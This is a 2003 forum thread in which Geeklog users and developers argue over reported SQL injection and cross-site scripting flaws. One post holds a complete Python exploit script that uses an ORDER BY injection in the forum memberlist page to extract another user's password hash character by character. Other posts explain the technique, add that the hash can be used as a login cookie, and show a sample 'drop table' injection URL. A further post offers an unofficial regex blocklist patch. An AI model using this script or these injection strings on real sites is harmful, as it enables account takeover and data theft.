Current Security Issues (Sept 2003)

Authored by: Anonymous on Monday, September 29 2003 @ 06:20 PM EDT

If no one can reproduce what he claims and he cannot give a working example, I think someone ought to submit a note to these bug trackers to close the issue. If he were a real security professional, he should be able to give a real-life working example of the exploits right away that he proudly found. What point is to report something no one else can reproduce.

[ Reply to This | # ]

Authored by: Tony on Tuesday, September 30 2003 @ 11:58 AM EDT

Once we have completed our own tests we may do that. It does appear you can do some things such as gain access to some information that they shouldn't but nothing super critical yet. It may still result in a security release but until we get it all tested we can't be for sure.

---
The reason people blame things on previous generations is that there's only one other choice.

[ Reply to This | # ]

Authored by: Anonymous on Tuesday, October 07 2003 @ 09:21 PM EDT

#!/usr/bin/python

"""

Messy geeklog exploit by jelmer


usage :


0. If you haven't got python installed download it at http://www.python.org/

1. register an account at the geeklog server you want to crack

2. change

OUR_USER_ID
OUR_USERNAME
OUR_PASSWORD
OUR_EMAIL

in the source code below to the values asigned to the account you generated

change GEEKLOG_LOCATION to the location of the geeklog you want to crack for instance
http://www.geeklog.net


3. Lookup the userID of the user you want to crack and fill it in as the TARGET_USER_ID below

4. run this script from the commandline by typing python geeklog.py,
*nix users can also chmod +x ./geeklog.py
Now wait (quite a long time) as it needs to crack 32 positions



notes :


theoreticly it can produce false results when a user registers while cracking is in progress

"""


import md5, urllib, urllib2, re


OUR_USER_ID = 7000
OUR_USERNAME = "yourusername"
OUR_PASSWORD = "yourpassword"
OUR_EMAIL = "your@email.com"

TARGET_USER_ID = 7001

GEEKLOG_LOCATION = "http://www.geeklog.net"


HASHCHARS = "0123456789abcdef"
GEN_PASSWORD_CHARS = "abcdefghijklmnopqrstuvwxyz"


def getSessionID(username, password):

myreq = urllib2.Request(GEEKLOG_LOCATION + "/users.php")

data = {"loginname" : username,
"passwd" : password
}

myreq.add_data(urllib.urlencode(data))
page = urllib2.urlopen(myreq)
cookies = page.info()["Set-Cookie"]
match = re.search(r"gl_session=([0-9]{1,15})", cookies)
return match.group(1)


def changePassword(sessionID, newPassword):

data = {"passwd" : newPassword,
"cooktime" : "604800",
"email" : OUR_EMAIL,
"uid" : str(OUR_USER_ID),
"mode" : "saveuser",
"username" : OUR_USERNAME
}

cookie = "gl_session=" + sessionID

myreq = urllib2.Request(GEEKLOG_LOCATION + "/usersettings.php")
myreq.add_data(urllib.urlencode(data))
myreq.add_header("Cookie",cookie)
urllib2.urlopen(myreq)

print "changed password to " + newPassword


def hexstr(inchars):
result = ''
for char in inchars:
result += ('0' + hex(ord(char))[2:])[-2:]
return result


def find(input, level, max, character, position):

found = False
result = ""

for char in GEN_PASSWORD_CHARS:

if not found:
start = input + char

if level < max:
found, result = find(start, level + 1 , max, character, position)
else:
if hexstr(md5.new(start).digest())[position] == character:
return True, start

return found, result


def generatePasswordWithHashCharAtPosition(character, position):

nrOfChars = 0
while True:
(found, value) = find ("", 0, nrOfChars, character, position)

if found:
return value
else:
nrOfChars +=1



sessionID = getSessionID(OUR_USERNAME, OUR_PASSWORD)

print "got session ID : " + sessionID

result = ""
for i in range(32):

print "cracked %s of 32 hash characters : %s" % ( i, result)

page = 1
found = False
for j in range(len(HASHCHARS)):

changePassword(sessionID, generatePasswordWithHashCharAtPosition(HASHCHARS[j], i))

while True:

webpage = urllib2.urlopen(GEEKLOG_LOCATION + "/forum/memberlist.php?order=mid(passwd," + str(i + 1) + ",1),uid&prevorder=uid&direction=ASC&page=" + str(page)).read()

us = webpage.find("users.php?mode=profile&uid=" + str(OUR_USER_ID) + '"')
target = webpage.find("users.php?mode=profile&uid=" + str(TARGET_USER_ID) + '"')


if us != -1 and target != -1:
found = us > target
break

elif us != -1:
break

elif target != -1:
found = True
break

else:
page += 1
print "probeer pagina " + str(page)

if found:
result += HASHCHARS[j]
break


print "hash complete : " + result

[ Reply to This | # ]

Authored by: Anonymous on Tuesday, September 30 2003 @ 05:23 PM EDT

Need help? hmm give me call www.h4ckerx.net ( xlordt ) i my self was a scriptkiddie ;) now im a white hat only when you dont piss me off =) anyways.. if you are interested in my help then xlord_tk@hotmail.com else ignor this reply

[ Reply to This | # ]

Authored by: Tony on Tuesday, September 30 2003 @ 05:51 PM EDT

Let me just open it up. Go out, read the claims on bugtraq and then see if you can reproduce any of them. Feel free to swing by our IRC channel if you have questions or want to chat with developers. The more eyes helping the better.

---
The reason people blame things on previous generations is that there's only one other choice.

[ Reply to This | # ]

Authored by: DTrumbower on Wednesday, October 01 2003 @ 12:09 PM EDT

Concatenated SQL Injection is not doable with mysql if your version is less than 4.1. So though it is still a future problem, it is not a big current problem for most people.

There still is the possibility of SQL injection but you just can't add damaging statements.

i.e. geeklog.net/topics.php?topic=general+;drop+ table

Mysql should give an error message.






---
Dwight

[ Reply to This | # ]

Authored by: Anonymous on Friday, October 03 2003 @ 08:18 AM EDT

hahahah.
Look at this.
the same guy that posted the supusedly found "bug", before letting know the developers of geeklog know first, USES GEEKLOG in his website.

http://security.novappc.com/

hahaha..

well. it doesn't even say it's also running "not such a Geek product" ;-)

[ Reply to This | # ]

Authored by: Anonymous on Friday, October 03 2003 @ 10:37 AM EDT

security.novappc.com was using pMachine since last year but Geeklog its better , and ,of course , itnis secured , it will not print errors or mysql outputs , dear anonymous , were you drunk ?
it's not good for your brain.
regards.

[ Reply to This | # ]

Authored by: Dirk on Sunday, October 05 2003 @ 05:37 PM EDT

[ Reply to This | # ]

Authored by: os on Monday, October 06 2003 @ 07:17 AM EDT

He also posted this on his webpage:

"
Due to the completely incorrect behavior of the Geeklog development team we had to design non-official patches for the Geeklog portal system.
These patches are for prevent and solve the SQL Injection vulnerabilities and the Cross Site Scripting attacks.
Geeklog Development Team ip addresses will be blocked in our server.
Check the BANNED staticpage for more info.

The security patches are available in http://www.nsrg-security.com/staticpages/index.php?page=FIXES-GEEKLOG

Regards, enjoy the patches.
"


os

[ Reply to This | # ]

Authored by: Anonymous on Tuesday, October 07 2003 @ 02:41 PM EDT

Geeklog Security Fixes


Here there are the needed codes and instructions for protect your Geeklog installation from bad users and the latest security holes ( reported by Lorenzo Hernandez Garcia-Hierro ) that are SQL Injections and Cross Site Scripting attacks.


Fix 1: The simple one-Cut & Paste


Cut this code and then put it in the first line of:
/[PATH TO YOUR GEEKLOG CORE FILES/CONFIG]/system/lib-security.php


Put it after the php tag



// ---
// Geeklog Security Fix against SQL Injections and XSS attacks
// By Lorenzo Hernandez Garcia-Hierro
// No Secure Root Group Security Research
// ---
foreach ($HTTP_GET_VARS as $secvalue) {
if ((eregi("<[^>]*script*"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*object*"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*iframe*"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*applet*"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*meta*"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*style*"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*form*"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*img*"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*span*"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*h1*"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*table*"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*body*"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*pre*"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*em*"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*input*"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*td*"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*option*"?[^>]*>", $secvalue)) ||
(eregi(";", $secvalue)) ||
(eregi("'", $secvalue)) ||
(eregi("´", $secvalue)) ||
(eregi("`", $secvalue)) ||
(eregi("+", $secvalue)) ||
(eregi(""", $secvalue))) {
die (";-) whereis *censored* *censored*: you");
}
}



This will we included in all the files of Geeklog , providing full protection against SQL Injection and Cross Site Scripting Attacks.


Fix 2: Obscure It !


This will stop the MySQL errors reporting to users , Geeklog will not show an error output in web pages.


Edit the lib-database.php file in /system/ dir


Go to line 152, and then edit , this is the original code:


function DB_query($sql, $ignore_errors=0)
{
global $_DB;

return $_DB->dbQuery($sql,$ignore_errors);
}



Replace it with:


function DB_query($sql, $ignore_errors=1)
{
global $_DB;

return $_DB->dbQuery($sql,$ignore_errors);
}



No more MySQL errors outputs in html pages !

NOTE: By editing the line 441 you can suppress completely the error ouput or add your own routines to the DB_error() function.


These fixes are made by Lorenzo Hernandez Garcia-Hierro due to the completely incorrect and non-professional behavior of the Geeklog Development Team.

Last Updated Sunday, October 05 2003 @ 11:01 PM CEST

------------------------------------------------------------------------

Get real, pitch in. I might not agree with the developers on all issues, but at least I play nice with them.

I would like to recognize the restraint, patience, and professionalism of our developers. Gentlemen I salute you in your efforts in looking to these problems and finding solutions that keep with the geeklog ideals.

And Mr.Garcia-Hierro, I salute you for you contributions to the GL community and efforts on our behalf. I hope you will continue in your passionate search for GL security loopholes, and for providing us with possible patches.

The first part of this post is to provide information to our developers, who most likely have already seen it via telnet/Http gateways that do not have banned ip's..... The same way I did.

Thank you all, and I hope that future interactions will be filled with a spirit of cooperation, as opposed to one of conflict.

Enjoy your day.

[ Reply to This | # ]

Authored by: Anonymous on Wednesday, October 08 2003 @ 07:17 AM EDT

http://www.derkeiler.com/Mailing-Lists/Full-Disclosure/2003-10/0413.html

[ Reply to This | # ]

Authored by: jhk on Wednesday, October 08 2003 @ 09:25 AM EDT

Pedantically speaking, the FORUM PLUGIN has a problem with SQL injection like the SHOUTBOX BLOCK had one with XSS. Granted, these are used on a lot of sites but they are not part of the GL1.3.8-1 download. It is a bit unfair to blame the GL developers for coding insecure 3rd party add-ons. :)

[ Reply to This | # ]

Authored by: Blaine on Wednesday, October 08 2003 @ 04:32 PM EDT

You only have to enable the GL Filter to have all HTML filtered thru the Core GL Functions. Additionally, You can limit the allowable HTML tags via the config.php.

The GL filter is not enabled on this site currently.

[ Reply to This | # ]

Authored by: Livin-Nappy on Thursday, October 09 2003 @ 03:02 AM EDT

OK, the long and the short of it for all of us that ARE NOT like super nerds (ALL HAIL THE SUPER NERDS WHO WITHOUT WE WOULD HAVE NO POWER!!!) What does this all mean, and what if any impact is it going to have on our sites?

---
Live Happy, Live Nappy!!
Michael

[ Reply to This | # ]

Authored by: Anonymous on Thursday, October 09 2003 @ 07:14 AM EDT

basicly your screwed untill someone patches the forum component soone can get full admin privileges on your blog

if your also using mysql 4.1 you also have to wait until they patch the sql injection issues reported earlier

[ Reply to This | # ]

Authored by: Anonymous on Thursday, October 09 2003 @ 10:53 AM EDT

This is uhhh kinda wrong. The forum has issues. These issues could currently be used to let a javascript take the cookie. The password is still encypted so they would have to bust that. And they could only take the encypted password of the admin if you tried to view that post with the javascript post.

A current fix for this is to disable the img tag especially in your forum and maybe just all your html tags to be especially safe. I'm not sure if this is easy to do in the forum as I don't use it but that should work.

Most of these issues that are being posted currently are blown way out of porportion and you don't really need to worry about. The geeklog development team is very very into security and if a real security issue is found be sure that it would be patched within a day or two.

I suspect all the issues, will be fixed in the next release, or in a service release if these are found to be valid issues. The forum will most likely be patched shortly.

I didn't proofread this message... sorry.

[ Reply to This | # ]

Authored by: Anonymous on Thursday, October 09 2003 @ 11:07 AM EDT

you are out of your mind. you dont have to crack the hash, you can just place it in your cookie

because geeklog keeps you logged in for a fixed period of time, one hour , one week, one year etc

how do you think this works, it works because it stores your hashed password and user id in a cookie .

as for the geeklog authors well they're clueless

[ Reply to This | # ]

Authored by: Anonymous on Thursday, October 09 2003 @ 03:28 PM EDT

You have a point. Whatever the case the issue with the FORUM plugin needs to be addressed, which I'm sure its being worked on. I do not believe this is an issue with any of the core features of geeklog.

Like I said before disable all your html and you won't have to worry about it.

[ Reply to This | # ]

Authored by: Anonymous on Thursday, October 09 2003 @ 07:13 PM EDT

you seem to not have noticed that the post also included a python script that uses sql injection rather than XSS to crack the password. eg. there is no defending against it

[ Reply to This | # ]

Authored by: Anonymous on Friday, October 10 2003 @ 09:40 AM EDT

So far like the other stuff the python script has not been able to be a success. I have personally tried running it and it gives an error when trying to run. I can't really tell what its trying to do except maybe exploit something else in the forum plugin. . . theres something to do with the forum plugin there.

So what have we still learned? The core geeklog has yet to have any security flaws actually seen. Plugin that a 3rd party made has some issues that need to be cleared up.

[ Reply to This | # ]

Authored by: Anonymous on Friday, October 10 2003 @ 02:46 PM EDT

>So far like the other stuff the python script has not been >able to be a success. I have personally tried running it and >it gives an error when trying to run.

It requires python 2.2 or higher

>I can't really tell what its trying to do except maybe exploit >something else in the forum plugin. . .
>theres something to do with the forum plugin there.

"/forum/memberlist.php?order=mid(passwd," + str(i + 1) + ",1),uid&prevorder=uid&direction=ASC&page=" + str(page))

you can order the memberlist by password or more specificly one character of the password. and thus determine its contents

>So what have we still learned? The core geeklog has yet to >have any security flaws actually seen.

We'll just see about that

>Plugin that a 3rd party made has some issues that need to be cleared up.

yes and this site is running it, it could easily be defaced

[ Reply to This | # ]

Authored by: tomw on Friday, October 10 2003 @ 03:06 PM EDT

I think you had better look at your code again. The forum memberlist.php does not allow you to sort the user list. Quit spreading this fud until you know what you are talking about. Here is the code that retrieves the member list.

$memberlistsql = DB_query("SELECT * FROM {$_TABLES['users']} WHERE uid <> 1 ORDER BY regdate");

The order by is not changeable!

I also ran your python script and could not get it to run -- by the way my python version is 2.3.

TomW
Not Anonymous

[ Reply to This | # ]

Authored by: DTrumbower on Friday, October 10 2003 @ 03:15 PM EDT

Sorry Tom, you can order it.
http://www.geeklog.net/forum/memberlist.php?order=username&prevorder=uid&direction=DESC&page=1

The headings are links.

I can get the script to run a while but then it pukes.

[ Reply to This | # ]

Authored by: wlparks on Friday, October 10 2003 @ 03:24 PM EDT

tomw, sorry but there are huge security issues with the forum plugin(I was the one defending geeklog earlier in this thread). I suggest anybody using it take it down until it is fixed.

I was the one replying to the other things but anyway I looked at the python script. I got it to ran. It puked 5 minutes in but his theory is right.

I guess it won't hurt for me to explain it here since anybody can look at his script.

You CAN order by anything on the memberlist page... I can't say that I have looked at the code for the forum plugin at all. Hell I haven't even installed it on my own personal site. But if they're using the latest version of the forum on geeklog.net you can sort by whatever you want. Order it anyway you want and more.

EXAMPLE.
http://www.geeklog.net/forum/memberlist.php?order=uid&direction=ASC

His python script didn't work for me but I could write something in another language that did the exact same thing. His theory is correct.

Heres how it works.

memberlist.php?order=mid(passwd," + str(i + 1) ",1),uid&prevorder=uid&direction=ASC&page=" + str(page)).read()

What he is doing is pulling back a character at a time and ordering the page based on the one character that is returned from the password field. From this he can compare it to where your own placement is on the return and tell if its higher or lower or equal. If you did look at the python script it is constantly changing your own password so it can compare it better.

I believe this is how it was working if not, that way should work :-p

[ Reply to This | # ]

Authored by: wlparks on Friday, October 10 2003 @ 03:29 PM EDT

woopsy sorry didn't see the dudes post that already explained how it worked.

[ Reply to This | # ]

Authored by: tomw on Friday, October 10 2003 @ 03:30 PM EDT

I admit I wasn't looking at the new version since it hasn't been released officially yet. The version for download here and most widely used does not have a sortable memberlist.

TomW

[ Reply to This | # ]

Authored by: Blaine on Friday, October 10 2003 @ 08:05 PM EDT

It appears this python attack was run against the new (un-released) membership.php that I was testing on this site and have distributed to a few users for testing.

I had enhanced (albeit now see the issue) to sort the display to improve it's usefullness. I've tried to inject SQL to add the order by clause in the current 2.2 release and was not able.
I'm able to force the ORDER BY SQL clause to be added to the sql statement but it is rejected as improper SQL syntax.

This was tested on MYSQL 3.23. I've not heard that anyone has done this on the released forum 2.2 release code.

I will be adding logic to filter out any SQL from being added on the URL path.

To filter out any Javascript and IMG tags with JS - just enable the GL Filter and ensure the IMG tag (and other potential XSS supported tags) are not allowable HTML.

Blaine

[ Reply to This | # ]

Authored by: Anonymous on Thursday, October 09 2003 @ 12:24 PM EDT

I don't think this attitude of "you're clueless", "you're unprofessional", "you're a liar" (said to Dirk on the Full Disclosure list) helps anybody. The people making these claims need to learn that you earn others' respect by showing them respect.

[ Reply to This | # ]